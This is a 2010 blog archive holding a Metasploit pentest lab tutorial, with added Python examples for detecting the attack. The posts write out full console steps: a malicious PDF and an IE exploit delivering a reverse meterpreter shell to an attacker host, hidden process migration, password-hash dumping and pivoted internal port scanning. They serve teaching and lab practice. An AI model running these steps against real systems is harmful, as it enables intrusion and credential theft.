Monthly Archives: September 2010

Metasploit on the edge Part 3 – Looking around

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.

Preamble

This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.

The following series of posts is going to change a little bit. We will still be walking through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server, but some of the detours I was planning on taking won’t happen. Vivek from securitytube.net has done an excellent series of video tutorials called the Metasploit Megaprimer and did a much better job of explaining the features of Meterpreter. Please go to securitytube.net and have a look.

Background
When last we left, we had just launched a meterpreter session on our internal client.

Process
So now that we have a toehold, let’s explore. First things first, I am going to grab the password hashes from the client machine. For a detailed explanation of Windows password hashing, see irongeek.com’s password exploitation class. Depending on the exploit used and the account the exploit was run under, you may have to do a
     meterpreter>use priv

     meterpreter>hashdump
The hashes will be displayed on the screen. For now, copy and paste them into a file for later use.
Let’s set up the client to allow us to scan other devices on the internal network.
First, let’s see what the internal network is like:
     meterpreter>route

Network routes
==============

    Subnet           Netmask          Gateway
    ------           -------          -------
    0.0.0.0          0.0.0.0          10.13.37.1
    10.13.37.0       255.255.255.0    10.13.37.149
    10.13.37.149     255.255.255.255  127.0.0.1
    10.255.255.255   255.255.255.255  10.13.37.149
    127.0.0.0        255.0.0.0        127.0.0.1
Now to use it in Metasploit, press CTRL-Z and select Y to background the session.

Next, we will set up Metasploit to route traffic for the internal subnet through the client’s meterpreter session (the arguments are the subnet, the network mask and the meterpreter session id):
     msf > route add 10.13.37.0 255.255.255.0 4

Now let’s do a scan (note: not all scans or exploits will work through this route).
We will use the tcp portscan:

     use auxiliary/scanner/portscan/tcp

     msf auxiliary(tcp) > show options

Module options:
   Name         Current Setting                Required  Description
   ----         ---------------                --------  -----------
   CONCURRENCY  10                             yes       The number of concurrent ports to check per host
   PORTS        21-25,80,137-139,443-445,3389  yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.13.37.1-254                 yes       The target address range or CIDR identifier
   THREADS      1                              yes       The number of concurrent threads
   TIMEOUT      1000                           yes       The socket connect timeout in milliseconds
   VERBOSE      false                          no        Display verbose output
Note: When doing your initial scan, it is best to limit your ports. Once you have some responses, you can scan more ports on a particular client if necessary.
     msf auxiliary(tcp) >exploit

[*] 10.13.37.1:21 – TCP OPEN
[*] 10.13.37.1:80 – TCP OPEN
[*] Scanned 026 of 254 hosts (010% complete)
[*] Scanned 051 of 254 hosts (020% complete)
[*] Scanned 077 of 254 hosts (030% complete)
[*] Scanned 102 of 254 hosts (040% complete)
[*] Scanned 127 of 254 hosts (050% complete)
[*] 10.13.37.130:80 – TCP OPEN
[*] 10.13.37.130:25 – TCP OPEN
[*] 10.13.37.130:139 – TCP OPEN
[*] 10.13.37.130:443 – TCP OPEN
[*] 10.13.37.130:445 – TCP OPEN
[*] 10.13.37.130:3389 – TCP OPEN
[*] Scanned 153 of 254 hosts (060% complete)
[*] Scanned 178 of 254 hosts (070% complete)
[*] Scanned 204 of 254 hosts (080% complete)
[*] Scanned 229 of 254 hosts (090% complete)
[*] 10.13.37.242:22 – TCP OPEN
[*] 10.13.37.242:80 – TCP OPEN
[*] 10.13.37.242:139 – TCP OPEN
[*] 10.13.37.242:445 – TCP OPEN
[*] 10.13.37.244:135 – TCP OPEN
[*] 10.13.37.244:139 – TCP OPEN
[*] 10.13.37.244:445 – TCP OPEN
[*] 10.13.37.245:22 – TCP OPEN
[*] 10.13.37.245:23 – TCP OPEN
[*] 10.13.37.245:21 – TCP OPEN
[*] 10.13.37.245:25 – TCP OPEN
[*] 10.13.37.245:80 – TCP OPEN
[*] 10.13.37.245:139 – TCP OPEN
[*] 10.13.37.245:445 – TCP OPEN
[*] Scanned 254 of 254 hosts (100% complete)
[*] Auxiliary module execution completed
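
Seen from inside the network, the sweep above has a distinctive shape: one internal host (the pivot, 10.13.37.149) touches hundreds of host:port pairs in a short time, and only a handful answer. The following is an added example, not code from the original post, showing how a defender can pick that pattern out of connection logs. The log lines are constructed in a simple "epoch src dst dport result" format (not captured from a real network); the port list and the responding hosts are taken from the scan output above.

```python
"""Detect a horizontal sweep sourced from an internal host.

Added example for the pivoted portscan above. One source touching many
distinct (dst, port) pairs inside one short time bucket is the signal; the
hosts that answered OPEN are what the scanner learned, so triage starts there.
"""
from collections import defaultdict

# Ports the post's scan used, and the host:port pairs its output shows as open.
SCANNED_PORTS = (21, 22, 23, 24, 25, 80, 137, 138, 139, 443, 444, 445, 3389)
RESPONDERS = {
    ("10.13.37.1", 21), ("10.13.37.1", 80),
    ("10.13.37.130", 25), ("10.13.37.130", 80), ("10.13.37.130", 139),
    ("10.13.37.130", 443), ("10.13.37.130", 445), ("10.13.37.130", 3389),
    ("10.13.37.242", 22), ("10.13.37.242", 80), ("10.13.37.242", 139),
    ("10.13.37.242", 445),
    ("10.13.37.244", 139), ("10.13.37.244", 445),
    ("10.13.37.245", 21), ("10.13.37.245", 22), ("10.13.37.245", 23),
    ("10.13.37.245", 25), ("10.13.37.245", 80), ("10.13.37.245", 139),
    ("10.13.37.245", 445),
}


def build_sample_log():
    """Constructed log (not real traffic): the pivot sweeps 10.13.37.1-254 at
    about one host per second, while a workstation (10.13.37.244) talks to the
    file server every five minutes. Format: 'epoch src dst dport result'."""
    lines = []
    base = 1284000000
    for n in range(1, 255):
        dst = f"10.13.37.{n}"
        for port in SCANNED_PORTS:
            result = "OPEN" if (dst, port) in RESPONDERS else "CLOSED"
            lines.append(f"{base + n - 1} 10.13.37.149 {dst} {port} {result}")
    for i in range(10):
        lines.append(f"{base + i * 300} 10.13.37.244 10.13.37.130 445 OPEN")
    return lines


def parse_line(line):
    ts, src, dst, dport, result = line.split()
    return int(ts), src, dst, int(dport), result


def detect_scanners(lines, window=60, min_targets=50):
    """Return {src: {"peak_targets": n, "responders": [...]}} for every source
    that touched at least `min_targets` distinct (dst, port) pairs within a
    single `window`-second bucket. `responders` lists the pairs that replied
    OPEN to that source, i.e. the hosts the scanner now knows about."""
    per_bucket = defaultdict(set)   # (src, bucket) -> {(dst, port)}
    answered = defaultdict(set)     # src -> {(dst, port)} that replied OPEN
    for line in lines:
        ts, src, dst, dport, result = parse_line(line)
        per_bucket[(src, ts // window)].add((dst, dport))
        if result == "OPEN":
            answered[src].add((dst, dport))

    alerts = {}
    for (src, _), targets in per_bucket.items():
        if len(targets) < min_targets:
            continue
        entry = alerts.setdefault(
            src, {"peak_targets": 0, "responders": sorted(answered[src])})
        entry["peak_targets"] = max(entry["peak_targets"], len(targets))
    return alerts


if __name__ == "__main__":
    for src, info in detect_scanners(build_sample_log()).items():
        print(f"{src}: {info['peak_targets']} distinct targets in one window; "
              f"{len(info['responders'])} host:port pairs answered")
```

The fixed-bucket count is deliberately simple: a host that legitimately talks to fifty distinct services a minute is rare on a client subnet, and the threshold is easy to tune per environment. A scanner that throttles below the threshold still shows up in the `responders` set, which is worth reviewing on its own since those are the next hosts an intruder will look at.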

Next Steps
Selecting the next target, creating a “backdoor”…maybe I will also spend some time making these posts look better too…..

Metasploit on the edge Part 2 – a foothold

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.

Preamble

This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.

The following series of posts will walk through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server. The purpose is not to go into great detail, but instead show the power of Meterpreter, its extensions and scripts.

Requirements

As mentioned previously, I will be using Backtrack 4 for the testing, and a few vulnerable machines. The first one up is an XP client with a vulnerable version of IE and Adobe Acrobat Reader.

I installed Adobe Reader 8 from oldapps.com for the purpose of this exercise.

Background

Metasploit has several interfaces, but I like the console, so that is what will be used for this exercise. Throughout the exercise, we will get deeper into and more familiar with Metasploit, but there are several excellent resources available for more information like the Metasploit.com site, the Metasploit mailing list, Offensive Security’s Metasploit Unleashed (offensive-security.com), some great videos and examples from Mubix (room362.com), IronGeek (irongeek.com) and the pauldotcom crew (pauldotcom.com) and a new course from SANS (sans.org) called Metasploit Kung Fu, just to name a few.

We will be setting up two different client side exploits in this part of the exercise. Both will use the meterpreter payload, which will be explained in more detail in the next instalment.

Process

Adobe:

Launch msfconsole
  load sounds
  use exploit/windows/fileformat/adobe_geticon
  set FILENAME report.pdf
  set OUTPUTPATH /tmp
  set payload windows/meterpreter/reverse_tcp
  set LHOST 192.168.111.155
  set LPORT 443
  set InitialAutoRunScript migrate -f
  show options
  exploit

Explanation: In Backtrack, I type msfconsole at a terminal to launch.

The first command enables sounds. This isn’t necessary for anything other than my own enjoyment. Many thanks to digininja for initially coming up with the idea for this functionality, and to HD for adding it to the base Metasploit framework.

The rest of the commands are setting up the exploit. We are using the adobe geticon exploit to create a pdf called report.pdf which will be saved in the /tmp folder. When the pdf is opened with a vulnerable version of adobe, it will connect back to the backtrack machine on port 443 (remember, the firewall only allows web ports).
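
The firewall in this lab lets 443 out because it expects HTTPS, but the reverse_tcp payload is plaintext, and that is the defender's opening. An HTTPS client opens a connection with a TLS ClientHello; a reverse_tcp stager connects and then waits for the server to speak first (a 4-byte stage length followed by the stage, which is the "Sending stage (748032 bytes)" line in the output later on this page). The following is an added example, not code from the post, that classifies flows to TCP/443 from the first bytes each side sent. All byte strings, hosts and the `flag_flows` helper are constructed for the example; the stage size is the one the post's output shows.

```python
"""Is what leaves on 443 actually TLS?

Added example for the "firewall only allows web ports" remark. HTTPS always
begins with a client-sent TLS ClientHello; a plaintext reverse_tcp stager
sends nothing and waits for the server to push the stage. Sample data is
constructed, not captured.
"""
import struct

TLS_HANDSHAKE_RECORD = 0x16   # TLS record content type: handshake
TLS_CLIENT_HELLO = 0x01       # handshake message type: ClientHello

# Constructed samples. The ClientHello is truncated after the version field;
# the stager sample is the 4-byte little-endian stage length (size taken from
# the post's output) followed by placeholder bytes standing in for the stage.
CLIENT_HELLO = bytes.fromhex("16030100c5010000c10303") + bytes(32)
STAGER_SERVER_FIRST = struct.pack("<I", 748032) + bytes(16)

SAMPLE_FLOWS = [  # constructed; 203.0.113.x is documentation address space
    {"src": "10.13.37.149", "dst": "203.0.113.10",
     "client_first": CLIENT_HELLO, "server_first": b""},
    {"src": "10.13.37.149", "dst": "192.168.111.155",
     "client_first": b"", "server_first": STAGER_SERVER_FIRST},
    {"src": "10.13.37.244", "dst": "203.0.113.20",
     "client_first": b"GET / HTTP/1.1\r\n", "server_first": b""},
]


def looks_like_tls_client_hello(data: bytes) -> bool:
    """True if `data` starts with a TLS handshake record (type 0x16, version
    3.x) whose first handshake message is a ClientHello (type 0x01)."""
    if len(data) < 6:
        return False
    record_type, major, minor, handshake_type = data[0], data[1], data[2], data[5]
    return (record_type == TLS_HANDSHAKE_RECORD and major == 3 and minor <= 4
            and handshake_type == TLS_CLIENT_HELLO)


def classify_443_flow(client_first: bytes, server_first: bytes) -> str:
    """Classify a TCP/443 flow from the first bytes each side sent.

    'tls'          client opened with a ClientHello, as HTTPS does
    'non-tls'      client spoke first but not TLS (plaintext on 443)
    'server-first' client sent nothing and the server spoke first; HTTPS never
                   does this, a reverse_tcp stage push always does
    'no-data'      neither side sent anything
    """
    if client_first:
        return "tls" if looks_like_tls_client_hello(client_first) else "non-tls"
    return "server-first" if server_first else "no-data"


def flag_flows(flows):
    """Return (src, dst, verdict) for every 443 flow that is not TLS."""
    flagged = []
    for flow in flows:
        verdict = classify_443_flow(flow["client_first"], flow["server_first"])
        if verdict != "tls":
            flagged.append((flow["src"], flow["dst"], verdict))
    return flagged


if __name__ == "__main__":
    for src, dst, verdict in flag_flows(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:443 {verdict}")
```

The check is cheap enough to run on the first packet of every outbound 443 flow, which is what a protocol-aware egress proxy or IDS does when told that 443 means TLS rather than "anything". It catches plaintext stagers only; a payload that wraps itself in real TLS needs certificate or destination inspection instead, which is why allowing a port is weaker than allowing a protocol.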

 

The AutoRunScript will, on a successful exploit, launch a hidden notepad.exe process on the client, and migrate the meterpreter payload to it. This will ensure that we don’t lose our meterpreter session as soon as the user closes Adobe (which they will, because to them, it would appear that Adobe just froze). Look for more on this in a future post.

I try to always do a show options to verify I didn’t make any typos before I start the exploit.

Before we send the file to our client, we have to set up a listener on our machine to receive the reverse meterpreter.

Still in the msfconsole:

   use exploit/multi/handler
   set payload windows/meterpreter/reverse_tcp
   set LHOST 192.168.111.155
   set LPORT 443
   exploit

Explanation: We are setting up a meterpreter listener for when the client opens our pdf. Metasploit will now dutifully wait until our client launches the pdf. When Metasploit “speaks” we know our target has launched the pdf.

Internet Explorer

This time, we will use a vulnerability in Internet Explorer.

  use exploit/windows/browser/ms10_018_ie_behaviors

Instead of showing each command, I will just display the options. Each one is set with the command

  set NAME #value#

msf exploit(ms10_018_ie_behaviors) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     192.168.111.155  yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     reports          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.111.155  yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista

Explanation: Notice that in this one, we didn’t set an initial script. This exploit has that setting already defined as the default, which you can verify by doing a show advanced.

All we have to do is type in exploit in our msfconsole, and convince our user to connect to http://192.168.111.155/reports.

msf exploit(ms10_018_ie_behaviors) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.111.155:443
[*] Using URL: http://192.168.111.155:80/reports
[*] Server started.
msf exploit(ms10_018_ie_behaviors) >
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.156:64144 (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (748032 bytes) to 192.168.111.156
[*] Meterpreter session 1 opened (192.168.111.155:443 -> 192.168.111.156:54337) at 2010-07-13 22:24:09 -0400
[*] Session ID 1 (192.168.111.155:443 -> 192.168.111.156:54337) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (352)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1416
[*] New server process: notepad.exe (1416)

msf exploit(ms10_018_ie_behaviors) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:3e:23:8a
IP Address : 10.13.37.149
Netmask : 255.255.255.0

Explanation: After the meterpreter has connected back to our listener, to interact with it you type sessions -i # where # is the Metasploit session number of that particular session, in our case 1. Then I type ipconfig to show the IP of the client’s machine.
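
The migration shown in the output above (and explained under the Adobe section's InitialAutoRunScript) leaves a very recognisable trail on the endpoint: a notepad.exe whose parent is a browser or document reader, which then owns an outbound connection. The following is an added example, not code from the post, that applies those two rules to endpoint telemetry. The events are constructed dicts in a Sysmon-like shape, using the PIDs and addresses from the session output above; the `analyse` function and the rule names are this example's own. One caveat built into the example: migration hands the existing socket to the new process, so a connection-creation event would still name iexplore.exe. The `net_established` records therefore stand for a periodic snapshot of established connections (netstat-style), which attributes the socket to its current owner.

```python
"""Spotting a migrate-into-notepad session from endpoint telemetry.

Added example covering the migrate -f AutoRunScript and the migration
output above. Two signals: an unusual parent for a no-network tool, and that
tool later owning an outbound connection. Events are constructed, not real.
"""

# Programs a user opens untrusted content with, and programs that have no
# business talking to the network. Both lists are illustrative.
DOC_HANDLERS = {"iexplore.exe", "acrord32.exe"}
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe"}

# Constructed telemetry. PIDs and the 192.168.111.155:443 destination follow
# the post's session output; 'net_established' models a periodic snapshot of
# established sockets, which names the current owner after a migration.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 352, "image": "iexplore.exe",
     "parent_image": "explorer.exe"},
    {"type": "net_established", "pid": 352, "image": "iexplore.exe",
     "dst": "192.168.111.155", "dport": 80},
    {"type": "process_create", "pid": 1416, "image": "notepad.exe",
     "parent_image": "iexplore.exe"},
    {"type": "net_established", "pid": 1416, "image": "notepad.exe",
     "dst": "192.168.111.155", "dport": 443},
    # benign: the user opens Notepad from the Start menu and it stays offline
    {"type": "process_create", "pid": 2000, "image": "notepad.exe",
     "parent_image": "explorer.exe"},
]


def analyse(events):
    """Return findings as (rule, pid, detail) tuples.

    suspicious-parent   a no-network tool spawned by a browser/document reader
    unexpected-network  a no-network tool owns an outbound connection
    likely-migration    both of the above for the same pid
    """
    flagged_parent = set()   # pids that already tripped suspicious-parent
    findings = []
    for ev in events:
        image = ev["image"].lower()
        if ev["type"] == "process_create":
            parent = ev["parent_image"].lower()
            if image in NO_NETWORK_EXPECTED and parent in DOC_HANDLERS:
                flagged_parent.add(ev["pid"])
                findings.append(("suspicious-parent", ev["pid"],
                                 f"{parent} -> {image}"))
        elif ev["type"] == "net_established" and image in NO_NETWORK_EXPECTED:
            rule = ("likely-migration" if ev["pid"] in flagged_parent
                    else "unexpected-network")
            findings.append((rule, ev["pid"],
                             f"{image} -> {ev['dst']}:{ev['dport']}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:20} pid={pid:<6} {detail}")
```

Either rule alone produces some noise (Reader really does spawn helper processes, and some "no network" tools phone home for updates), which is why the combined `likely-migration` finding is the one worth paging on. Note that the browser's own connection to port 80 on the same attacker host is not flagged here; correlating it by destination with the notepad.exe socket is an easy next step once the events are in one place.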

 

Next Steps

Exploring the client’s network.

Metasploit on the edge

Metasploit on the edge originally aired on digitalcliff.spaces.live.com

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.

Preamble

This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.

The following series of posts will walk through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server. The purpose is not to go into great detail, but instead show the power of Meterpreter, its extensions and scripts.

Part 1 – The setup

Requirements

Before we can begin we need to set up our environment. I will be using VMware and sometimes VirtualBox, but any virtualization software or even a physical setup will work.

If you are looking for a really fun lab to test against, sign up for the Pentesting with Backtrack course from http://www.information-security-training.com. Not only do you get the excellent courseware, but the lab environment and the learning opportunities are amazing.

Background

My attack machine will be a Backtrack 4 virtual machine, but any machine with Metasploit and some form of remote desktop client will work.

Our victims will be various Windows machines (make sure they are licensed, or use demo versions) behind a firewall that blocks internet traffic from entering, but allows client access to the internet. Our ultimate target is a Windows server that is located in the “secure” DMZ.

Process

At a high level our plan of attack will be:
    Exploit the client.
    Scan the internal environment with Metasploit.
    Exploit our next victim.
    Use the second victim to explore and attack the final victim, the Windows server.
    Complete the attack by accessing the remote desktop of the Windows server.

Along the way, we will demo some client side exploits (a browser exploit and a pdf exploit), use the Meterpreter functions for pivoting (route and portfwd), some Meterpreter extensions (sniffer, incognito), creating a reverse Meterpreter executable and using some post exploitation scripts.

Next steps

Exploiting the client

Welcome to Blogger

I’ve been trying live spaces. It works OK, but thought I would give blogger a try.

The purpose of the blog (like just about every other blog) is to help me keep track of things and if it helps someone else, great.

Most of the blogs will be focused on information security, but there might be the odd rant, review or random thought.